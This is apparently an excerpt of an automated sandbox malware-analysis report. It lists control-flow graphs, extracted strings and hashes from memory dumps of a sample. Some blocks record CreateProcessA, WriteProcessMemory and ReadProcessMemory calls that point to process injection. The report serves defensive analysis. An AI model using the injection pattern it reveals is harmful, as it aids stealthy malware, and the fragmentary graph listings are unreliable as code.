                                      control_flow_graph 358 2c1ca2-2c1ce0 363 2c1cf1-2c1cf8 call 2c18b0 358->363 364 2c1ce2-2c1cf0 358->364 367 2c1d09-2c1d23 363->367 368 2c1cfa-2c1d08 363->368 370 2c1e0e-2c1e81 call 2c5238 367->370 371 2c1d29-2c1d36 367->371 395 2c1e83 call 2c1ee0 370->395 396 2c1e83 call 2c1ef0 370->396 371->370 372 2c1d3c-2c1d46 371->372 372->370 373 2c1d4c-2c1d56 372->373 373->370 375 2c1d5c-2c1d76 373->375 377 2c1d79-2c1d97 375->377 377->370 379 2c1d99-2c1dbe 377->379 379->370 380 2c1dc0-2c1dd2 379->380 380->377 382 2c1dd4-2c1dd6 380->382 384 2c1dd9-2c1dde 382->384 384->370 385 2c1de0-2c1dea 384->385 385->384 387 2c1dec-2c1e0d 385->387 393 2c1e89-2c1e96 395->393 396->393
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $W$.*=
                                      • API String ID: 0-2291536991
                                      • Opcode ID: a6efdf31f52a0b2b2ad69e8a06ce052eafae3cf9695929fbc15a993adca5db73
                                      • Instruction ID: 2403b15e128c3a0f4b729cb523d2189cff76d9d5c043a32804d099cdda510961
                                      • Opcode Fuzzy Hash: a6efdf31f52a0b2b2ad69e8a06ce052eafae3cf9695929fbc15a993adca5db73
                                      • Instruction Fuzzy Hash: BC51C035B101158FCB14DB78D881AAEB7B2EFCA315715827AEA05C7756EB30EC61CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 444 2c0911-2c0ad2 467 2c0b0c-2c0b0e 444->467 468 2c0ad4-2c0b0a 444->468 469 2c0b14-2c0b1e 467->469 470 2c0b10-2c0b12 467->470 468->467 471 2c0b20-2c0b36 469->471 470->471 474 2c0b3c-2c0b44 471->474 475 2c0b38-2c0b3a 471->475 476 2c0b46-2c0b4b 474->476 475->476 479 2c0b4d-2c0b60 476->479 480 2c0b65-2c0b8e 476->480 479->480 483 2c0bc9-2c0bd3 480->483 484 2c0b90-2c0b9c 480->484 485 2c0bdc-2c0c66 483->485 486 2c0bd5 483->486 484->483 487 2c0b9e-2c0bab 484->487 497 2c0c68-2c0ca8 485->497 498 2c0caa-2c0cb8 485->498 486->485 490 2c0bad-2c0baf 487->490 491 2c0bb1-2c0bc4 487->491 490->483 491->483 501 2c0cc3-2c0d10 497->501 498->501 517 2c0d13 call 2c198e 501->517 518 2c0d13 call 2c1990 501->518 519 2c0d13 call 2c1a31 501->519 505 2c0d19-2c0d98 520 2c0d9e call 2c22a0 505->520 521 2c0d9e call 2c22b0 505->521 509 2c0da4-2c0da6 510 2c0da8-2c0dc4 509->510 511 2c0dd4-2c0df0 509->511 516 2c0dd0-2c0dd2 510->516 513 2c0dfe 511->513 514 2c0df2 511->514 514->513 516->510 516->511 517->505 518->505 519->505 520->509 521->509
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (Fl$48l
                                      • API String ID: 0-2888918871
                                      • Opcode ID: f86ad1a773914b1d9b54cad82a63d32923a3197bbe6a4b864c6cc8af30658b5d
                                      • Instruction ID: bbfa84470eba90ef92110808b7bc2821983ba60324c7d32c4ac598f8e71f07d9
                                      • Opcode Fuzzy Hash: f86ad1a773914b1d9b54cad82a63d32923a3197bbe6a4b864c6cc8af30658b5d
                                      • Instruction Fuzzy Hash: B3E18F35A10529CFDB14DFB9D884AADB7B2BF88305F11C629E406EB365DB34AD058F90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: tl
                                      • API String ID: 0-379094156
                                      • Opcode ID: 323229162344c6652f417eeb40d1423dbf9871d302c52ee7dbd886a45e2f2900
                                      • Instruction ID: 95a4e2b84ce6059f78d7dabd4f5f7b6b6a310acf9a4388fa6d3d470358f7026b
                                      • Opcode Fuzzy Hash: 323229162344c6652f417eeb40d1423dbf9871d302c52ee7dbd886a45e2f2900
                                      • Instruction Fuzzy Hash: 6F817B32B205159FD714DB69D880FAEB3E3AFC8314F1A8169E809DB766DA35DC11CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (Fl
                                      • API String ID: 0-3640630996
                                      • Opcode ID: 484136bc7160776fcad97221226217b811c02e73206b67d8354e9dc733c175d6
                                      • Instruction ID: b21d70f8c3f2d19e622698a727e5286458da5aec894eee17fef5e35956373958
                                      • Opcode Fuzzy Hash: 484136bc7160776fcad97221226217b811c02e73206b67d8354e9dc733c175d6
                                      • Instruction Fuzzy Hash: 367108B8D5020EDFDF14CFA9D485AEEBBB1BB48300F20A659D412EB291DB31A951CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (Fl
                                      • API String ID: 0-3640630996
                                      • Opcode ID: cc8e1e1472dc4b662b42fa87da9111193dd1be79c6bcda526d7afb403a52a81d
                                      • Instruction ID: f087c8fdd2f36a8cd54d464a8e0c9b5c7a052d7a6354beba45b82ec6fd68c3c3
                                      • Opcode Fuzzy Hash: cc8e1e1472dc4b662b42fa87da9111193dd1be79c6bcda526d7afb403a52a81d
                                      • Instruction Fuzzy Hash: 00511CB8D4020ADFDF10CFA5D881AEEBBB1BF89300F20A659D411EB251DB359A51CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b7f38b40174e35f5b699853e5e7106b22fa96005b6a47bc386f788da66545e93
                                      • Instruction ID: 8e5a380484e5fda15a6a8dcbb9a0c6863f86689ce085b2a3ceda440a71aea4f0
                                      • Opcode Fuzzy Hash: b7f38b40174e35f5b699853e5e7106b22fa96005b6a47bc386f788da66545e93
                                      • Instruction Fuzzy Hash: 06615C32F205259FD714DB69C880F9EB3A3AFC8714F2AC169E8159B766DA34DC11CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 55e1c5eca499a16b3c2d69b356b3703581663fffb74212592421cb82cd5a6062
                                      • Instruction ID: ae8b860b8bf910af90fedd9154a80ca9a3c3fd9c1c160e307a0b128662d5a785
                                      • Opcode Fuzzy Hash: 55e1c5eca499a16b3c2d69b356b3703581663fffb74212592421cb82cd5a6062
                                      • Instruction Fuzzy Hash: 5321C971E146489BEB18CFABC80059EFBF7AFC9300F14C13A9418AB259DB705906CF41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 134 2c2938-2c2945 135 2c2947-2c2951 134->135 136 2c2952-2c29f1 134->136 135->136 152 2c29f8-2c2a1a 136->152 153 2c2a21-2c2e52 call 2c07f8 * 10 152->153 221 2c2e58-2c2e5d 153->221 244 2c2e62 call 2c2f60 221->244 245 2c2e62 call 2c3100 221->245 222 2c2e68-2c2e95 225 2c2e9c-2c2ea6 222->225 226 2c2eac-2c2f43 call 2c07f8 * 2 225->226 242 2c2f48-2c2f4a 226->242 243 2c2f51-2c2f58 242->243 244->222 245->222
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: +$+$=
                                      • API String ID: 0-3271284183
                                      • Opcode ID: d5472e937e50f1c8264a61fb20c5f278a9a59b25ad752b33e8d4083e7f0037ca
                                      • Instruction ID: 4dffc19b84049b4d685b29c44f1ba0035b6c89f8d4da3e0333f7edc5d5a40f3e
                                      • Opcode Fuzzy Hash: d5472e937e50f1c8264a61fb20c5f278a9a59b25ad752b33e8d4083e7f0037ca
                                      • Instruction Fuzzy Hash: 08021C34610604CFCB58EF78C495B9EB7A6AF89304F1185BCD80A9F369DB39AC45CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 246 2c0114-2c2e5d call 2c07f8 * 10 356 2c2e62 call 2c2f60 246->356 357 2c2e62 call 2c3100 246->357 334 2c2e68-2c2f58 call 2c07f8 * 2 356->334 357->334
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: +$+$=
                                      • API String ID: 0-3271284183
                                      • Opcode ID: e53cb47ccbcf216d63ef0165555d2aba9ede89274c02b60a5a83bc3065e2bae3
                                      • Instruction ID: ba1fdb7d6d022641081dde563b60edff695cb14a9f014a6d8d7694f0755318fa
                                      • Opcode Fuzzy Hash: e53cb47ccbcf216d63ef0165555d2aba9ede89274c02b60a5a83bc3065e2bae3
                                      • Instruction Fuzzy Hash: 88021C34610604CFCB58EF78C495B9EB7A6AF89304F1185BCD80A9F369DB39AC45CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 397 2c6e30-2c6e5e 398 2c6e94-2c6ec3 397->398 401 2c6ec9-2c6ed5 398->401 402 2c7085-2c7091 398->402 403 2c6e60-2c6e63 401->403 407 2c70bf-2c70c2 402->407 408 2c7093-2c7096 402->408 405 2c6e6c-2c6e80 403->405 406 2c6e65 403->406 405->402 434 2c6e86-2c6e92 405->434 406->398 406->405 409 2c7029-2c703e 406->409 410 2c6f65-2c6f6e 406->410 411 2c7066-2c706b 406->411 412 2c7002-2c700c 406->412 413 2c7043-2c7047 406->413 414 2c701f-2c7024 406->414 415 2c6fdf-2c6feb 406->415 416 2c6f19-2c6f1f 406->416 417 2c6ef9-2c6efd 406->417 418 2c705a-2c705e 406->418 419 2c6fb7-2c6fbb 406->419 420 2c6ed7-2c6ede 406->420 421 2c7070-2c7084 406->421 408->407 409->403 410->402 431 2c6f74-2c6fa3 call 2c6008 410->431 411->403 412->402 425 2c700e-2c701a 412->425 427 2c7049 413->427 428 2c7053-2c7058 413->428 414->403 415->402 424 2c6ff1-2c6ffd 415->424 416->402 430 2c6f25-2c6f40 416->430 438 2c6f07-2c6f14 417->438 418->411 422 2c6fbd-2c6fc4 419->422 423 2c6fd8-2c6fdd 419->423 420->402 429 2c6ee4-2c6ef4 420->429 422->402 433 2c6fca-2c6fce 422->433 423->415 436 2c6fd3 423->436 424->403 425->403 435 2c704e 427->435 428->418 428->435 429->403 430->402 442 2c6f46-2c6f51 430->442 431->402 441 2c6fa9-2c6fb2 431->441 433->436 434->403 435->403 436->403 438->403 441->403 442->402 443 2c6f57-2c6f60 442->443 443->403
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ,/l$`!l$`!l
                                      • API String ID: 0-3429197752
                                      • Opcode ID: a320426cd2c3f78ada6022889454db2ebbabf5a2a89a2bbb46554b0e0feddca5
                                      • Instruction ID: 296ed1ba517f53edfe91d8ac8aef9f2f7de527f4ce33a01c5af56c4adb219ac9
                                      • Opcode Fuzzy Hash: a320426cd2c3f78ada6022889454db2ebbabf5a2a89a2bbb46554b0e0feddca5
                                      • Instruction Fuzzy Hash: 2D617E70A28619CBC704CF74C545FBEF7B2EF44305F14865AE556AB292C774E860CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 522 2c2f60-2c2f6d 523 2c2f6f-2c2f79 522->523 524 2c2f7a-2c306d call 2c07f8 * 2 522->524 523->524 546 2c3077-2c30a2 524->546 549 2c30ba-2c30f4 call 2c07f8 546->549 550 2c30a4-2c30aa 546->550 551 2c30ac 550->551 552 2c30ae-2c30b0 550->552 551->549 552->549
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: `!l$`!l
                                      • API String ID: 0-3986300676
                                      • Opcode ID: d003d826f3ca3904a8cd391fe2cd0a88ecdf80db40fb3bc0f7b20562a5a4ba9d
                                      • Instruction ID: 0af91f0f04cbbbef40a777e3b4fb6d001edc9cee974fe6de23d9c7953c98efd0
                                      • Opcode Fuzzy Hash: d003d826f3ca3904a8cd391fe2cd0a88ecdf80db40fb3bc0f7b20562a5a4ba9d
                                      • Instruction Fuzzy Hash: A241D0347001148FC748EF78C455AAE7BF2EF8A300B2582A9E406DB7B6DE30DC158B91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 557 2c1750-2c177c 561 2c177e-2c1785 557->561 562 2c1788-2c1790 557->562 564 2c179c-2c17b6 562->564 565 2c1792-2c1799 562->565 567 2c17bc-2c17c9 564->567 568 2c1899 564->568 567->568 569 2c17cf-2c17d9 567->569 570 2c189e-2c18b3 call 2c18d6 568->570 569->568 571 2c17df-2c17e9 569->571 573 2c18b9-2c18bb 570->573 571->568 572 2c17ef-2c180a 571->572 574 2c180d-2c1825 572->574 575 2c18bd-2c18c0 573->575 576 2c18c1-2c18c7 573->576 574->568 577 2c1827-2c1853 574->577 577->568 578 2c1855-2c1866 577->578 578->574 579 2c1868-2c186a 578->579 580 2c186d-2c1872 579->580 580->568 581 2c1874-2c187e 580->581 581->580 582 2c1880-2c1896 581->582
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $.*=
                                      • API String ID: 0-954985398
                                      • Opcode ID: a3759018e1dfe1861cb17157b789fa68822ae3d4d580dc0d89d370e2c71b5e5c
                                      • Instruction ID: 8279bb17e4e13ac4cce1dde26994cc2c28efaed34a1e614b55cd4479e6310b81
                                      • Opcode Fuzzy Hash: a3759018e1dfe1861cb17157b789fa68822ae3d4d580dc0d89d370e2c71b5e5c
                                      • Instruction Fuzzy Hash: D8419B75F1410A8FDB10DFA9E881AAEBBB6FB85311F14862AD514D7706D730EC62CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 584 2c5e48-2c5e68 585 2c5e8a-2c5eaf 584->585 588 2c5eb4-2c5ebe 585->588 589 2c5eb1 585->589 590 2c5ec7-2c5eca 588->590 591 2c5ec0-2c5ec5 588->591 589->588 592 2c5ecd-2c5edc 590->592 591->592 594 2c5e6a-2c5e6d 592->594 595 2c5e6f 594->595 596 2c5e76-2c5e88 594->596 595->585 595->596 597 2c5f4c-2c5f55 595->597 598 2c5ede-2c5ef8 595->598 599 2c5f58-2c5f5c 595->599 600 2c5f0b-2c5f1c call 2c62a7 595->600 601 2c5f82-2c5f88 595->601 596->594 597->599 613 2c5efe-2c5f06 598->613 614 2c5fc5 598->614 602 2c5f5e-2c5f68 599->602 603 2c5f7b-2c5f80 599->603 612 2c5f22-2c5f25 600->612 604 2c5f8c-2c5f98 601->604 605 2c5f8a 601->605 607 2c5fca-2c5fcf 602->607 608 2c5f6a-2c5f71 602->608 603->601 611 2c5f76 603->611 609 2c5f9a-2c5fa5 604->609 605->609 608->611 620 2c5fbd-2c5fc4 609->620 621 2c5fa7-2c5fad 609->621 611->594 612->614 615 2c5f2b-2c5f35 612->615 613->594 614->607 615->607 619 2c5f3b-2c5f47 615->619 619->594 622 2c5faf 621->622 623 2c5fb1-2c5fb3 621->623 622->620 623->620
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 48l$48l
                                      • API String ID: 0-1341598364
                                      • Opcode ID: b92453e6b805f2a793cc467d00983777328f697ed8b93306270424f062a73c4f
                                      • Instruction ID: d616d7b7a0ec7c55f8b5049860545689e4138700a5deb5e801f5baa09a8283f3
                                      • Opcode Fuzzy Hash: b92453e6b805f2a793cc467d00983777328f697ed8b93306270424f062a73c4f
                                      • Instruction Fuzzy Hash: 3041F330A20A26CFDB148FA8C845F7EB6B5FB45340F64466EE102D7691DB74E9A08B51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 625 2c6008-2c602c 626 2c6062-2c6067 625->626 627 2c602e-2c6031 626->627 628 2c603a-2c604e 627->628 629 2c6033 627->629 637 2c617e-2c6186 628->637 649 2c6054-2c6060 628->649 629->626 629->628 630 2c60cc-2c60dd 629->630 631 2c611e-2c612a 629->631 632 2c6098-2c60a2 629->632 633 2c60b9-2c60c7 629->633 634 2c6069-2c6074 629->634 635 2c610a-2c610e 629->635 636 2c6164-2c616b 629->636 639 2c60df-2c60e3 630->639 640 2c60e4-2c60e6 630->640 631->637 645 2c612c-2c614e 631->645 632->637 638 2c60a8-2c60b4 632->638 633->627 643 2c607d-2c6084 634->643 644 2c6076 634->644 635->637 642 2c6110-2c6119 635->642 636->637 646 2c616d-2c6179 636->646 638->627 639->640 647 2c60e8-2c60ef 640->647 648 2c6103-2c6108 640->648 642->627 643->637 652 2c608a-2c6096 643->652 650 2c607b 644->650 645->637 651 2c6150-2c6161 645->651 646->627 647->637 654 2c60f5-2c60f9 647->654 655 2c60fe 648->655 649->627 650->627 652->650 654->655 655->627
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 48l$48l
                                      • API String ID: 0-1341598364
                                      • Opcode ID: ed1f7d8af55c0affeaf03e90f309ab0a9255d014aa1307001e5f3f83c03ece7b
                                      • Instruction ID: 18bce1237faf54d71265fbde3bb151cb6f8b08b75f763043b9e898c54766cde1
                                      • Opcode Fuzzy Hash: ed1f7d8af55c0affeaf03e90f309ab0a9255d014aa1307001e5f3f83c03ece7b
                                      • Instruction Fuzzy Hash: 67419134925616CBC7209FA8CC08BBABBF1FF44306F18826BE429D72A5D3B4D961C711
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 696 ec7270-ec7309 698 ec730b-ec7322 696->698 699 ec7352-ec737a 696->699 698->699 704 ec7324-ec7329 698->704 702 ec737c-ec7390 699->702 703 ec73c0-ec7416 699->703 702->703 714 ec7392-ec7397 702->714 712 ec745c-ec7553 CreateProcessA 703->712 713 ec7418-ec742c 703->713 705 ec734c-ec734f 704->705 706 ec732b-ec7335 704->706 705->699 709 ec7339-ec7348 706->709 710 ec7337 706->710 709->709 711 ec734a 709->711 710->709 711->705 732 ec755c-ec7641 712->732 733 ec7555-ec755b 712->733 713->712 721 ec742e-ec7433 713->721 715 ec7399-ec73a3 714->715 716 ec73ba-ec73bd 714->716 718 ec73a5 715->718 719 ec73a7-ec73b6 715->719 716->703 718->719 719->719 722 ec73b8 719->722 723 ec7435-ec743f 721->723 724 ec7456-ec7459 721->724 722->716 726 ec7441 723->726 727 ec7443-ec7452 723->727 724->712 726->727 727->727 729 ec7454 727->729 729->724 746 ec7651-ec7655 732->746 747 ec7643-ec7647 732->747 733->732 748 ec7665-ec7669 746->748 749 ec7657-ec765b 746->749 747->746 750 ec7649 747->750 752 ec7679-ec767d 748->752 753 ec766b-ec766f 748->753 749->748 751 ec765d 749->751 750->746 751->748 755 ec767f-ec76a8 752->755 756 ec76b3-ec76be 752->756 753->752 754 ec7671 753->754 754->752 755->756 759 ec76bf 756->759 759->759
                                      APIs
                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00EC7537
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1050454587.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_ec0000_mum.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: 2078b01c2118541fadea4b1190dfd02494a525e6d2c2549f80963ad1fdfef0bb
                                      • Instruction ID: b271677be7eed7071441ed428b44efd73d32b8e5da1ce7e5c6db7518d6499e85
                                      • Opcode Fuzzy Hash: 2078b01c2118541fadea4b1190dfd02494a525e6d2c2549f80963ad1fdfef0bb
                                      • Instruction Fuzzy Hash: FDC13670D0426D8FCB24DFA4C941BEDBBB1BF49308F0091A9E959B7240DB719A86CF95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 761 2c4051-2c4118 773 2c411e-2c486e 761->773 774 2c4504-2c454a 761->774 778 2c454c-2c4585 774->778 779 2c458b-2c4592 774->779 778->779 780 2c4594-2c45cd 779->780 781 2c45d3-2c45da 779->781 780->781 782 2c45dc-2c4615 781->782 783 2c461b-2c4622 781->783 782->783 786 2c4624-2c462f 783->786 787 2c4696-2c46f4 783->787 789 2c4688-2c4694 786->789 794 2c4728-2c474f 787->794 795 2c46f6-2c4726 787->795 789->787 791 2c4631-2c4685 789->791 791->789 799 2c4758-2c47c2 794->799 795->799 802 2c47c8-2c47d4 799->802 803 2c47db-2c47ee 802->803 804 2c47fd-2c4827 803->804 807 2c4829-2c482c 804->807 808 2c4842-2c484d 804->808 809 2c482e-2c483c 807->809 810 2c484f 808->810 811 2c4854-2c485a 808->811 809->808 812 2c4166-2c4174 809->812 810->811 813 2c417b-2c41d7 812->813 814 2c4176 812->814 817 2c4264-2c4268 813->817 814->813 817->809 818 2c426e-2c4275 817->818 819 2c41dc-2c41fd 818->819 820 2c427b-2c42b0 818->820 823 2c41ff-2c4202 819->823 824 2c4209-2c4215 819->824 828 2c42da 820->828 829 2c42b2-2c42be 820->829 825 2c4206-2c4207 823->825 824->825 827 2c4217-2c4218 824->827 825->820 830 2c4255-2c425c 827->830 833 2c42e0-2c4313 828->833 831 2c42c8-2c42ce 829->831 832 2c42c0-2c42c6 829->832 834 2c425e-2c4261 830->834 835 2c421a-2c4228 830->835 836 2c42d8 831->836 832->836 843 2c4315-2c434d 833->843 844 2c4362-2c440d 833->844 834->817 837 2c422f-2c4237 835->837 838 2c422a 835->838 836->833 840 2c424f-2c4252 837->840 841 2c4239-2c424d 837->841 838->837 840->830 841->834 843->804 852 2c4477-2c4483 844->852 853 2c440f-2c4437 852->853 854 2c4485-2c44fe 852->854 855 2c443e-2c446b 853->855 856 2c4439 853->856 854->774 855->820 862 2c4471-2c4474 855->862 856->855 862->852
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ~
                                      • API String ID: 0-1707062198
                                      • Opcode ID: e2b8452f6f624c42ac3b058b0249afafccbe6f45fc3885d8f7ba2d17a6941984
                                      • Instruction ID: 1533c210069240f84bdfe3ba127a3213df6e19564cf1223157d73151f7a6f682
                                      • Opcode Fuzzy Hash: e2b8452f6f624c42ac3b058b0249afafccbe6f45fc3885d8f7ba2d17a6941984
                                      • Instruction Fuzzy Hash: 7942CE75A10218CFCB15DF98C990E99BBB2FF49314F1581D9EA09AB222C731ED91DF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 864 ec6e48-ec6eb3 866 ec6eca-ec6f31 WriteProcessMemory 864->866 867 ec6eb5-ec6ec7 864->867 869 ec6f3a-ec6f8c 866->869 870 ec6f33-ec6f39 866->870 867->866 870->869
                                      APIs
                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00EC6F1B
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1050454587.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_ec0000_mum.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: 0b10fd215fd402dba859a6ff542e57af2a1443a236f8fea8c868f2cfdb5ec546
                                      • Instruction ID: 269b6749ec5428a1496c1573c876c33c24821f386ce6afb59694880ad3f07ab0
                                      • Opcode Fuzzy Hash: 0b10fd215fd402dba859a6ff542e57af2a1443a236f8fea8c868f2cfdb5ec546
                                      • Instruction Fuzzy Hash: FC4199B4D012589FCF00CFA9D984AEEBBF1FB49314F20942AE814B7250D775AA56CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00EC708A
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1050454587.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_ec0000_mum.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: c0e0dca2d218f3ab22046d4d4dfe38e3f9ccc3e1babf3acdb0b84e3af0c6b96f
                                      • Instruction ID: 87009ba1858299a3d92564d05f3c6b065cd4e3e1183dfee2502c91c8206db94b
                                      • Opcode Fuzzy Hash: c0e0dca2d218f3ab22046d4d4dfe38e3f9ccc3e1babf3acdb0b84e3af0c6b96f
                                      • Instruction Fuzzy Hash: C241A8B4D042589FCF10CFA9D884AEEFBB1BF49314F10A42AE815B7240D775A956CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00EC708A
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1050454587.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_ec0000_mum.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: af089c4e5237859089468bf5ee15b87b5078ec894b5f610d6a4adaf2928fec43
                                      • Instruction ID: 27c0d3d60ec7eee214753b54404876434a4e7c0f43fcf018c5415fb7b25a184e
                                      • Opcode Fuzzy Hash: af089c4e5237859089468bf5ee15b87b5078ec894b5f610d6a4adaf2928fec43
                                      • Instruction Fuzzy Hash: E84196B4D042589FCF10CFA9D884AEEFBB1BB49314F10A42AE815B7240D775A956CFA4
